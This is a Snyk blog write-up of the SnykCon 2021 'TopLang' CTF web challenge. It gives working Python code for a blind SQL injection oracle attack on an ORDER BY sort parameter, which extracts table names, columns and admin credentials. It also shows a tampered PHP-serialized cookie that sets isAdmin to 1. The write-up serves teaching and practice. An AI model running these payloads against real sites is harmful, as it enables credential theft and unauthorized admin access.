CTF secrets revealed: TopLang challenge from SnykCon 2021 explained

Written by:

Michael Aquilina

January 6, 2022

0 mins read

If you attended SnykCon 2021, you may remember our inaugural CTF: Fetch the Flag. In this CTF, TopLang was a web challenge of medium difficulty that we received a lot of positive feedback about. So for those of you that loved it, this write-up explains how our team internally approached tackling and solving this challenge. Even better, you can try this challenge out for yourself by heading to https://ctf-2021.snyk.io/ and heading to the Challenges section.

This challenge was a pretty typical example of what is known as an “oracle attack” using blind SQL injection. I will be explaining the process for how we approached this problem with the assumption the reader is unfamiliar with CTF challenges. The steps taken are written in quite a lot of detail but I do make the assumption that the reader has some knowledge of Python and SQL.

The challenge description given was:

What is your favourite programming language?

Challenges sometimes give hints about what the solution could be. But it seems like there’s no information to make use of in this one. So let’s head straight into our initial investigations!

Initial investigation

At the start of any CTF web challenge, it’s good to get familiar with what web pages are available and what they contain before we start writing any code. This initial investigation should give you some indication of potential attack vectors and understand where the CTF flag is likely to be stored. This investigation shouldn’t take you more than 10 minutes and simply involves clicking on the various links available and taking down notes for anything that seems potentially useful.

Opening the web link provided in the challenge description greets us with the following page:

We can see a table of data that displays top programming languages for 2020 and 2021 along with some additional metadata like ratings.

The columns seem to be sortable when the column header is clicked on. More importantly, sorting by specific columns adds the sort query string parameter to the url. For example, sorting by the “Jun 2021” column gives us the url path/?sort=jun2021

Any kind of input we can manipulate is a potential attack vector we can take advantage of, so that seems like an interesting lead we can look at later.

Another very obvious place to explore is the Admin panel link at the bottom of the page. Clicking on it redirects us to /admin.php. There does not seem to be much to do here unless we are logged in.

If we proceed to head to the login page, we get a standard login form:

We can try some common login combinations like “admin” / “admin” but none of them seem to work. Considering this is a web challenge, we can be fairly confident that we don’t need to brute force this login page with a password cracking tool like THC Hydra.

It seems likely that we need to somehow extract the login and password values from the server and use them to log into this admin panel.

Ok, now that we’ve got a good understanding of the various different pages, let’s dig a bit deeper to see if there is anything that looks exploitable.

SQL injection

The top programming languages data is rendered as a table on the web page and allows different ways to order the data based on the sort query string parameter. Given this information, there’s a decent probability that the data is being retrieved and queried using an SQL database in the backend.

If we are indeed working with an SQL backend, we can check if the page is vulnerable to SQL Injection attacks.

Note: We could try using an SQL injection tool like sqlmap to make this CTF challenge a bit easier. In fact in many cases this would actually work just fine. However during the contest I actually had little luck with getting it working on this challenge. Rather than spend a lot of time trying to understand what options I needed to enable in order to get the tool working well, I decided to just write my own exploit code instead. It’s also just a lot more fun writing code for the solution yourself!

We previously saw that the sort query string parameter was a good candidate for a potential attack vector. The value passed to the sortparameter looks like it could be the name of a column in a database table. Here are the possible values you can get by pressing the various column headers:

sort=jun2020
sort=jun2021
sort=ratings
sort=change

If this column name is being passed to an SQL query ORDER BY statement using insecure string formatting, we would be able to extract data using a blind SQL injection attack.

A good way to test out whether this is vulnerable is to check if we can change the order of the results using a CASE statement with a boolean condition. In particular, will we get different orderings when the CASE statement evaluates to True or False? Let’s test out the following two sort values and see what happens:

?sort=”(CASE WHEN 1=1 THEN jun2021 ELSE jun2020)”
?sort=”(CASE WHEN 1=0 THEN jun2021 ELSE jun2020)”

At this stage in the process, it’s good to start writing scripts to interact with the target web page. Both because it’s likely that we will need to have automations in place very soon anyway and because web browsers like Firefox and Chrome tend to mangle and transform complicated inputs which contain whitespace and other special characters.

I’m personally quite familiar with Python and it’s generally a great language to use for CTF’s because of how easy it is to get a working solution running with the help of some external packages.

If we install the requests and BeautifulSoup libraries from PyPi, we can request the page and parse the HTML output to check for differences in the results. In particular, we can detect changes by checking if the page has a difference in the order of the languages column.

We can see that “C” is always the top language in both 2020 and 2021. However, we can see that “Go” was the least favourite language in 2021 and “Fortran” was the least favourite language in 2020. With this in mind, we can write some code that checks what the least favourite language was to check for differences.

So let’s create a function that returns what the last language on the page being returned is:

1import requests
2from bs4 import BeautifulSoup
3
4HOST = "https://snyk-top-lang.chals.io/" 
5
6def get_data(command): 
7    payload = f"(CASE WHEN ({command}) THEN jun2021 ELSE jun2020 END)" 
8
9    resp = requests.get(HOST, params={"sort": payload}) 
10
11    soup = BeautifulSoup(resp.text, 'html.parser') 
12
13    return soup.find_all(“td”)[-3].get_text()

So if we tie a True condition to Jun2021 and a False condition to Jun2020, we should expect “Go” as an output if we pass a True statement to get_data and “Fortran” as an output if alternatively, we pass a False statement to get_data.

One easy way to pass a True statement to SQL is “1=1” and “1=0” could be our False statement.

Let’s test this out using some code!

1print(“1=1:”, get_data(“1=1”))
2print(“1=0:”, get_data(“1=0”))

This gives us the output:

11=1: Go
21=0: Fortran

Success! We’ve successfully managed to get the order changed using a boolean condition! This test is all the proof we need that the order parameter is susceptible to a blind SQL injection attack. Now all we need to do is take advantage of this exploit.

Oracle attack

Our blind SQL injection exploit is a form of “oracle attack”. An oracle attack works by asking the server “yes or no” questions, which gives us an indication about how close we are to our target value.

In our case, it seems likely that our goal is the login and password values for the admin panel form we previously saw.

Using an oracle attack, we can't ask the server to give us the login and password directly. But we can keep sending the server guesses about what the login and password are and slowly improve them to get the correct answers.

The usual trick to taking advantage of this oracle attack is to ask questions involving substrings that slowly become more specific as we get positive answers.

Here’s an example of what a series of questions to the oracle could look like without code:

“Does the login start with a?” Server: No
“Does the login start with b?” Server: No
“Does the login start with c?” Server: Yes
“Does the login start with ca?” Server: No
“Does the login start with cb?” Server: No
“Does the login start with cc?” Server: No
“Does the login start with ce?” Server: Yes

We keep repeating this operation until we’ve extracted all the login contents character by character. Assuming the password is also in plain text, we can also do the same thing for the password.

So let’s translate this into code. We can start off by writing an oraclefunction that returns True if the answer to our question is “yes” and False if the answer to our question is “no”. If we tweak our original get_data function, we can check what the output of the last language in the HTML table is to determine the result of our yes or no questions:

1import requests 
2import string 
3from bs4 import BeautifulSoup 
4
5HOST = "https://snyk-top-lang.chals.io/" 
6
7def oracle(command): 
8    payload = f"(CASE WHEN ({command}) THEN jun2021 ELSE jun2020 END)"
9
10    resp = requests.get(HOST, params={"sort": payload}) 
11
12    soup = BeautifulSoup(resp.text, 'html.parser') 
13
14    results = soup.find_all("td")
15
16    # If the last row is Go, then we are sorted by jun2021
17    # which means our command evaluates to True
18    return results[-3].get_text() == "Go" 
19
20# Make sure the oracle function is working correctly!
21assert oracle("1=0") is False 
22assert oracle("1=1") is True

Extracting login information

We know that we need to retrieve the login and password from the database. However, the problem is that we know nothing about the SQL schema to write our queries. We could try to take a guess about what the table names and columns are (we know some teams that did this), but our team actually extracted the database metadata first in order to know what tables and columns to query.

By attempting various queries that are specific to each popular SQL backend type (SQLite, MySQL, PostgreSQL and SQL Server) and seeing which ones did not crash the web page, we managed to figure out that we are dealing with an SQLite database backend.

Querying what tables and columns are available within an SQLite database is a nice and simple operation to perform. Let’s start off with understanding what tables are available for us to extract data from.

The following query would give us a list of all the table names in an SQLite database:

1SELECT DISTINCT name 
2FROM sqlite_master 
3WHERE type='table' AND name NOT LIKE 'sqlite_%'

However, we can’t just pass this to our oracle function because it's not a “yes” or “no” question. To fix this we can concatenate all the table names together using the GROUP_CONCAT function and send guesses about what the values of that concatenation result are using the substr function.

Combining this together, we get:

1SELECT substr(GROUP_CONCAT(name), ':'), 1, {end})=’{guess}’
2FROM sqlite_master 
3WHERE type='table' AND name NOT LIKE 'sqlite_%'

Notice that we have end and guess as parameters to our query. The parameter guess would simply be what our current guess is and end is the character length of our guess plus one.

We now just need to update our code to send guesses to the server character by character. Our code needs to keep sending these requests until the oracle returns a True response. When we do get a True response back we just move on to the next character and repeat the same process to keep refining our guess.

Here’s what that code looks like:

1import requests
2import string
3from bs4 import BeautifulSoup
4
5HOST = "https://snyk-top-lang.chals.io/"
6
7def oracle(command):
8    payload = f"(CASE WHEN ({command}) THEN jun2021 ELSE jun2020 END)"
9
10    resp = requests.get(HOST, params={"sort": payload})
11
12    soup = BeautifulSoup(resp.text, 'html.parser')
13
14    results = soup.find_all("td")
15    return results[-3].get_text() == "Go"
16
17assert oracle("1=0") is False
18assert oracle("1=1") is True
19
20buffer = ""
21
22alphabet = string.ascii_lowercase + string.ascii_uppercase + string.digits + ":" 
23
24while True:
25    for character in alphabet:
26        guess = buffer + character
27        print("trying", guess)
28        end = len(buffer) + 1
29        command = f"SELECT substr(GROUP_CONCAT(name), ':'), 1, {end})='{guess}' FROM sqlite_master WHERE type='table' AND name NOT LIKE 'sqlite_%'"
30        if oracle(command):
31            buffer = guess
32            print("Found", buffer)
33            break
34    else:
35        print("Reached End")
36        break

When running this code, you will see that the contents of all the table names will be leaked out to us character by character:

If we wait until the script ends, the final result will be “users:languages”. This means we have a users table and a languages table that we can dive further into. Considering our aim is to login to the admin panel we can make a safe bet that the “users” table is what we want to delve further into.

The next step is to understand what columns are available within the users table. SQLite has a PRAGMA_TABLE_INFO(table_name) function which allows us to query the names of columns in a specific table. In our case the query would look something like:

1SELECT name
2FROM PRAGMA_TABLE_INFO(‘users’)

Again, because we only want to send oracle style questions to our server we can convert this using GROUP_CONCAT and the substr functions to get this SQL query payload:

1SELECT substr(GROUP_CONCAT(name, ':'), 1, {end})='{guess}'
2FROM PRAGMA_TABLE_INFO('users')

All we need to do is change our previous script so that the command variable is updated with this new query.

1while True:
2    for character in alphabet:
3        guess = buffer + character
4        print("trying", guess)
5        end = len(buffer) + 1
6
7        command = f"SELECT substr(GROUP_CONCAT(name, ':'), 1, {end})='{guess}' FROM PRAGMA_TABLE_INFO('users')"
8        if oracle(command):
9            buffer = guess
10            print("Found", buffer)
11            break
12    else:
13        print("Reached End")
14                 break

Running this again would now eventually give us the answer:

1id:login:password:admin

Looks like we have our target columns login and password. All that’s left is to send SQL payloads to extract all the information out of them:

Here’s the SQL payload in an oracle format that would extract the login data:

1SELECT substr(GROUP_CONCAT(login, ':'), 1, {end})='{guess}' FROM users

And here’s the SQL payload in an oracle format to extract the passworddata:

1SELECT substr(GROUP_CONCAT(password, ':'), 1, {end})='{guess}' FROM users

You can run both of these by just replacing the value of commandin the same script for each case just as we did before. Running these attacks will successfully leak out two sets of login/password combinations.

I won't ruin the fun and will leave it for you to find out what the answers are for yourself.

Admin Panel login

Using the login information we just extracted, we can successfully login to the admin panel at /admin.php.

However, there seems to be one final challenge we need to overcome as we are greeted with this web page:

Fortunately, the solution to this last step is quite easy. It’s always a good idea to check what cookies are being stored on your browser to see if we can manipulate them to our benefit. On the Firefox Storage tab, we can see the following:

In particular, the parsed value shows us that the cookie is storing an isAdmin value and it currently has the value of 0. Let us see what happens if we change that value to 1 instead.

If we copy the entire cookie value we have:

1O%3A4%3A%22User%22%3A2%3A%7Bs%3A5%3A%22login%22%3Bs%3A6%3A%22kirill%22%3Bs%3A7%3A%22isAdmin%22%3Bb%3A0%3B%7D

Without needing to understand what this encoding was, our team decided the easiest thing to do is to just change the “0” towards the end of string to a “1” and replace the cookie value in our browser:

1O%3A4%3A%22User%22%3A2%3A%7Bs%3A5%3A%22login%22%3Bs%3A6%3A%22kirill%22%3Bs%3A7%3A%22isAdmin%22%3Bb%3A1%3B%7D

Digging into this after the CTF was completed, it became clear that this was simply a PHP serialized object. However, I think it's worth showing that taking shortcuts like what we did is a perfectly acceptable approach in a CTF challenge where the time savings could make a difference in your overall standing in the leaderboards.

If you pop this into the Value tab (double click and then paste your newly edited cookie) and then refresh the page we’ll be greeted with the coveted SNYK{...} CTF flag! I’ve once again removed the actual result from the screen so that you can try this out for yourself:

Wrapping up... for now!

So to summarize, here’s a quick run-through of all the steps we took:

We investigated the available pages and discovered an order query string as well as an admin login page
We successfully tested that the order query string was vulnerable to Blind SQL injection attacks
We extracted the table names, column names and data of the login information for the admin page.
We changed the data in our browser’s cookies to trick the server into thinking we were logged in as an administrator and finally retrieved the Snyk CTF flag

I hope you enjoyed this CTF write-up and maybe even learned something new! CTF challenges are a great way to learn about real-world exploits and as a result, make you more likely to defend against them in your own systems. We will be posting more write-ups in the future so stay tuned for more detailed guides.

Finally, John Hammond (Senior Security Researcher at Huntress) has created some detailed explainers of some of the other Fetch the Flag CTFs from SnykCon 2021. I encourage you to give them a watch:

If you’re interested in joining the Security Research team here at Snyk that builds these CTFs (and a whole lot more), check out our open positions!

The developer security platform